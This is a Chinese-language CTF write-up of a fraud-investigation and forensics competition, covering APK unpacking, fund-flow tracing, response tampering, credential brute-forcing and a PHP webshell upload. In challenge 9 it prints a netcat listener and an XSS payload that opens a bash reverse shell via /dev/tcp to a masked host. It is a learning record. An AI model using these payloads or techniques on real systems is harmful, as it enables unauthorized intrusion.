知更无糖斟茶王者巅峰挑战赛

花了两天时间通关，学到了很多技巧和思路，遂记录下本次比赛解题过程

解题过程

 0x01 前言 

 1 欲望陷阱 

打开题目生成的网站，下载案件背景文档case.docx

访问短信中APP的链接，下载

拖入GDA即可得到包名

 2 踏雪寻痕 

使用压缩程序解压apk，找到/assets/index.html

用浏览器打开，F12查看元素

访问其中链接到的网站，F12查看元素即可得到SDK，FLAG即为最后16位字符串

 3 曲径通幽 

使用题目给的模拟调证平台进行调证

在下载的表格中找到小付宝的支付订单号

对小付宝订单号进行调证

得到姓名，即为本题FLAG

 4 按图索金 

查看案情文件case.docx，得到三个泰州市游唐商业银行的收款账号

YT3226801028457114、YT3271228780646571、YT3271475162664434

对三个银行卡号的账单详细进行调证

为了方便后续分析将第一、二、三次转账的账单信息文件分别命名为1/2/3.xlsx，打开Navicat，在本地新建一个数据库，将1/2/3.xlsx分别导入为表1/2/3，Navicat中右键点击表选择导入向导，选择Excel文件

选择表

另外两张表一样导入

根据案情，第一次受害人李楠于2022-02-10 12:23:34转账1w元，收款人为李珠轩，第二次于2022-02-10 18:45:02转账2w元，收款人为彭晓筠，第三次于2022-02-11 15:09:43转账2w元，收款人为游红美以时间为依据，筛选出每个收款人之后的支出记录

根据金额以及时间判断李珠轩分别转了5k给毛友易和桂夏槐，彭晓筠将2w转给了侯雅唱，游红美分别给朱怜南、萧雅隽和赵以柳转了4k、6k、1w。再去分别调取下一级收款人的账单信息导入数据库

毛友易给方南珍转了两次2.5k；桂夏槐给方吉玉转了2k，给余玉华转了3k；侯雅唱给罗新晴转了2w；朱怜南给罗新晴转了4k；萧雅隽给罗新晴转了6k；赵以柳给钟颖初转了1w。再去调取下一级的账单信息，导入数据库分析。可以得到方南珍将5k转给了罗新晴；方吉玉将2k转给了罗新晴；余玉华将2999转给了罗新晴；钟颖初将1w转给了罗新晴。整个资金链如下，最后所有赃款全部转到了罗新晴YT3291338144307289（本题FLAG）

 5 以力破巧 

在js文件中找到/api/flag/login

也可以用findsomething

访问/api/flag/login，得到本题FLAG

 6 灯火阑珊 

findsomething爬取到了一个/api/login接口

在JS文件里面找到

用ChatGPT分析登录逻辑

首先访问/api/login，抓包

放包

拦截返回包

修改result的值为matched

放包

成功进入登录页面后，根据第三题得到的手机号去调证平台社工库调证

得到几个账号密码

bp抓登录包以上面用户名密码为字典进行爆破

得到账号密码：lowfly/lyw13841228350以及本题FLAG

 7 破茧取丝 

接上题，登录后台

在客服管理中可以看到客服ID以及姓名

在聊天查询中可以根据用户名或手机号配合客服ID查询聊天记录

根据案件背景文档得到受害人李楠手机号18622334455，联系他的客服是小丽，查到小丽的ID

再去查询聊天记录

得到一个二维码，QR Research扫描得到网址

为apk下载地址

和第二题一样的思路，下载后解包，找到/assets/index.html

得到本题FLAG

 8 与虎添翼 

下载镜像，解压

用X-Ways进行分析，找到/www/server/panel/data/default.db其中记录了宝塔的操作日志等信息

使用Navicat打开，在logs表中找到登录的ip和端口，即为本题FLAG

 9 刀斩虎翼 

访问公司网站

在联系我们处找到第1个FLAG

在邮箱登录的忘记密码处找到第2个FLAG

得到管理员账号为[email protected]，使用第6题的密码lyw13841228350成功登录

在已发件记录中找到一个server.zip

下载后拿到第3个FLAG

同样在已发送记录里面找到一个重置好的密码，为第4个FLAG

在收件箱中找到拜托该用户帮忙重置OA密码的邮件

访问地址后面一串为第5个FLAG

使用zcq/HAU5MU4DUPT3UOUA登录OA系统

在个人设置处可以上传文件，没有任何过滤，上传一个PHP大马，抓包得到文件路径

访问大马并用密码登录

在/home/zcq/data.csv找到第6个FLAG

下载网站源码，用vscode打开，全局搜索FLAG

在index.php将FLAG写入到了数据库中，写一个获取数据库中数据的PHP脚本

上传到网站根目录后访问

拿到第7个FLAG

在OA平台的向老板提建议处存在一个XSS

使用XSS平台生成一个payload尝试打cookie

在XSS平台中得到的数据并没有cookie

访问一下后台，并没有任何认证机制

发现是使用Node.js编写的

尝试反弹shell

vps上监听本地8999端口

nc -lvnp 8999

提建议处提交

<script>require('child_process').exec('bash -c "bash -i >& /dev/tcp/xxx.x.xxx.xx/8999 0>&1"')</script>

在/home/boss/work/ziliao目录中找到FLAG.txt

拿到第8个FLAG

在当前目录下有个sfz.png，可能是重要线索

base64 sfz.png > sfz.txt

将其base64编码输出到sfz.txt，再复制sfz.txt中内容

使用https://www.ec95.com/进行解码转换为png文件

得到一张身份证，在/home/boss/work/kehu目录下找到kehu.xlsx

一样进行base64编码输出到txt文件中再复制内容进行解码

发现需要密码，使用passwarekit爆破

得到密码184428，对应上了前面得到的身份证后6位，打开xlsx得到第9个FLAG

复盘总结

通过本次比赛，学习到了一套较完整的取证、资金流分析思路，了解到了一点真实案件的侦办难度，最后的nodejs命令执行反弹shell，是作者第一次接触，之前从来没有想过通过一个XSS漏洞可以执行命令反弹shell，网安之路道阻且长，继续学习！

本文章仅对个人学习过程进行记录总结，请勿利用文章内的相关技术从事非法测试，如因此产生的一切不良后果与文章作者和本公众号无关，如果喜欢还请多多点赞和关注

持续更新学习笔记

您的关注就是对我最大的支持

原文始发于微信公众号（XiAnG学安全）：知更无糖斟茶王者巅峰挑战赛